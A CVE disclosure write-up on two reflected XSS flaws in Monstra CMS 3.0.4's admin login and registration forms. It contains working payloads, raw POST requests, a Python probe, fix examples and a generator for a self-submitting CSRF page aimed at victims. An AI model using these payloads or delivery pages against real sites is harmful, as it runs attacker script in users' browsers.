Proof of Concept Walkthrough for CVE-2018-11472 and CVE-2018-11473

This article covers two cross-site scripting (XSS) vulnerabilities I found in Monstra CMS 3.0.4.

Both bugs are of medium impact and were easy to find and reproduce.

First, some background on XSS.

The standard definition, taken from OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because the browser thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. Such scripts can even rewrite the content of the HTML page.

Both bugs below are reflected XSS: the value submitted in a form field is echoed back into the HTML of the response without being encoded, so a value that closes the surrounding attribute and opens a new tag becomes live markup.

In the coming days I will publish a more detailed explanation of XSS in the Articles tab.

CVE-2018-11472

Vulnerability Type : Cross-Site Scripting (XSS), reflected

Affected Product : Monstra CMS 3.0.4 (vendor: Monstra)

Affected Component : the admin login form, http://localhost/monstra/admin/index.php?id=pages (login parameter)

Attack Type : Remote

Attack Vectors / Steps:

1) Go to http://localhost/monstra/admin/index.php?id=pages (the admin login form).
2) Enter a username and password and submit the form.
3) Capture the POST request in Burp Suite (intercept on).
4) In the body of the POST request there is a field login=. Set it to the following payload (the leading "> breaks out of the attribute value the login field is reflected into, so the <svg> element becomes live markup): "><svg/onload=prompt(8)>
5) Forward the request and turn intercept off.
6) A prompt pops up in the browser (the number passed to prompt() is arbitrary; the captured request below uses 1337).

POST REQUEST:

POST /monstra/admin/index.php?id=pages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra/admin/index.php?id=pages
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

login="><svg/onload=prompt(1337)>&password=xxxxxx&login_submit=Log+In

(The quotes in the payload are straight ASCII double quotes; the curly quotes some copies of this page show are an artifact of the blog software.)

Screenshot: Screenshot (258) (image not reproduced in this text copy)
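As an added example (not code from this write-up and not Monstra's code), here is a small Python helper for reproducing and verifying the first bug: it builds the PoC body exactly as the browser URL-encodes it, classifies how a response reflects the payload (raw, entity-encoded, or not at all), and renders the vulnerable and the hardened form of the reflection side by side. The two render_* functions and the sample responses are constructed for illustration only; probe() is the one function that touches the network and is the only part that should be pointed at a real test instance.

```python
"""Reflected-XSS reproduction and verification helper (added example).

Assumptions that are NOT taken from the original write-up:
  - the login page echoes the submitted `login` value inside a
    value="..." attribute without encoding it (the "> prefix of the
    payload is what suggests an attribute context);
  - the render_* functions below are constructed stand-ins for the
    vulnerable and the fixed template, not Monstra's code.
"""
import html
import re
import urllib.parse
import urllib.request

PAYLOAD = '"><svg/onload=prompt(1337)>'   # payload from the captured request
TARGET = "http://localhost/monstra/admin/index.php?id=pages"


def build_form_body(fields: dict) -> str:
    """URL-encode a form body the way the browser (and Burp) put it on the wire."""
    return urllib.parse.urlencode(fields)


def login_poc_body(payload: str = PAYLOAD, password: str = "xxxxxx") -> str:
    """Body of the CVE-2018-11472 PoC request: the payload goes in `login`."""
    return build_form_body(
        {"login": payload, "password": password, "login_submit": "Log In"}
    )


def reflection_status(body: str, payload: str) -> str:
    """Classify how `payload` comes back in an HTML response.

    'raw'     - reflected byte-for-byte: "> closes the attribute and the
                <svg> element is live markup -> exploitable
    'encoded' - reflected with < > " turned into entities -> safe
    'absent'  - not reflected at all
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def extract_live_svg(body: str) -> list:
    """Return every <svg ... onload=...> that ended up as a real tag."""
    return re.findall(r"<svg[^>]*onload=[^>]*>", body, flags=re.IGNORECASE)


def probe(url: str = TARGET, payload: str = PAYLOAD) -> str:
    """Send the PoC request and classify the reflection (network; not used in tests)."""
    data = login_poc_body(payload).encode()
    req = urllib.request.Request(
        url, data=data, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return reflection_status(resp.read().decode("utf-8", "replace"), payload)


# Constructed stand-in for the vulnerable template: the submitted value is
# concatenated straight into the attribute.
def render_login_form_vulnerable(login: str) -> str:
    return f'<input type="text" name="login" value="{login}">'


# Hardened stand-in: entity-encode before it reaches the attribute. The PHP
# equivalent is htmlspecialchars($login, ENT_QUOTES, 'UTF-8').
def render_login_form_fixed(login: str) -> str:
    return f'<input type="text" name="login" value="{html.escape(login, quote=True)}">'
```

Run probe() against a test instance: 'raw' reproduces CVE-2018-11472, while 'encoded' is what a patched page returns once the value is passed through htmlspecialchars with ENT_QUOTES (the quote=True in html.escape matters: without it the " that closes the attribute would survive).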

 

CVE-2018-11473

Vulnerability Type : Cross-Site Scripting (XSS), reflected

Affected Product : Monstra CMS 3.0.4 (vendor: Monstra)

Affected Component : the user registration form, http://localhost/monstra/users/registration

Attack Type : Remote

Attack Vectors / Steps:

1) Start filling in the registration form with your details.
2) Turn intercept on in Burp Suite.
3) Submit the form, capture the POST request, and change one of the fields in the request body (the login field in the request below) to the payload: "><svg/onload=alert(1337)>
4) Generate a CSRF PoC page from the modified request and send it to the victim.
5) When the victim opens that page, the form is submitted on their behalf and the script executes in their browser.

Caveat for steps 4 and 5: the request carries a csrf parameter. This write-up does not establish whether Monstra checks that token against the victim's session; if it does, the auto-submitted form is rejected and the payload only fires for a user who submits it with their own valid token. The reflection itself (step 3) does not depend on this.

POST REQUEST:

POST /monstra/users/registration HTTP/1.1
Host: localhost
Cache-Control: no-cache
Referer: http://localhost/monstra/users/registration
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=xxxx; login_attempts=i%3A5%3B
Accept-Encoding: gzip, deflate
Content-Length: 142
Content-Type: application/x-www-form-urlencoded

csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48&login="><svg/onload=prompt(1)>&password=&email=&answer=&register=Register
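Step 4 above says to make a CSRF PoC of the modified request. The following Python is an added example (not the write-up's code and not Burp's generator) of what that page is: the captured body from the request above is parsed into fields and wrapped in a self-submitting form. The point worth seeing in code is that every value has to be HTML-escaped inside the attacker's page, otherwise the payload fires on the attacker's page and never reaches the target as the literal string. The csrf value is the one from the captured request; whether the target accepts it for another user's session is an assumption this example does not verify.

```python
"""CSRF PoC page generator for the CVE-2018-11473 delivery step (added example).

Assumptions that are NOT taken from the original write-up:
  - CAPTURED_BODY is the body of the PoC request above, with straight
    quotes; a real capture would show the payload URL-encoded, which
    parse_qsl handles the same way;
  - the csrf token is assumed to be accepted for the victim's session.
    If the server binds it to the session that issued it, this page is
    rejected and the payload only fires for whoever submits a valid token.
"""
import html
import re
import urllib.parse

REGISTRATION_URL = "http://localhost/monstra/users/registration"

CAPTURED_BODY = (
    "csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48"
    '&login="><svg/onload=prompt(1)>&password=&email=&answer=&register=Register'
)


def parse_captured_body(body: str) -> list:
    """Split a raw application/x-www-form-urlencoded body into (name, value) pairs.

    keep_blank_values=True keeps password=, email= and answer=, which the
    server may require to be present even when empty. Each pair is split on
    the first '=' only, so the '=' inside onload=prompt(1) stays in the value.
    """
    return urllib.parse.parse_qsl(body, keep_blank_values=True)


def csrf_poc_html(action: str, fields: list) -> str:
    """Build a self-submitting HTML form carrying the given fields.

    Every name and value is entity-encoded with quote=True. The payload is
    itself HTML, so pasting it raw into value="..." would execute it on
    this page instead of submitting it to the target.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for n, v in fields
    )
    return (
        "<html><body>\n"
        f'  <form id="f" method="POST" action="{html.escape(action, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


def build_poc(body: str = CAPTURED_BODY, action: str = REGISTRATION_URL) -> str:
    """The page to host and send to the victim."""
    return csrf_poc_html(action, parse_captured_body(body))


def submitted_values(poc_html: str) -> dict:
    """What the victim's browser will actually POST from the generated page:
    the entity-encoded attribute values decoded back to literal strings.
    Used to confirm the payload round-trips unchanged."""
    pairs = re.findall(r'name="([^"]*)" value="([^"]*)"', poc_html)
    return {html.unescape(n): html.unescape(v) for n, v in pairs}


if __name__ == "__main__":
    print(build_poc())
```

Save the output of build_poc() as an .html file and open it in a browser logged in to the target; the form posts to /monstra/users/registration with the same six fields as the captured request, and submitted_values() confirms that login arrives as the literal "><svg/onload=prompt(1)> rather than as entities.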

External Links:

CVE-2018-11472

https://github.com/nikhil1232/Monstra-CMS-3.0.4-Reflected-XSS-On-Login-

CVE-2018-11473

https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page

Timeline:

23/05/18 :- Tried to contact Monstra CMS, but got no reply.

25/05/18 :- Requested CVE IDs from MITRE.

25/05/18 :- CVE IDs were assigned, and MITRE asked for a public disclosure of the PoC.

26/05/18 :- Provided the public disclosure (my GitHub repos with the PoCs, linked above).

27/05/18 :- The CVE IDs and the issue were made public by MITRE.

That's all for now. See you next time. Goodbye.
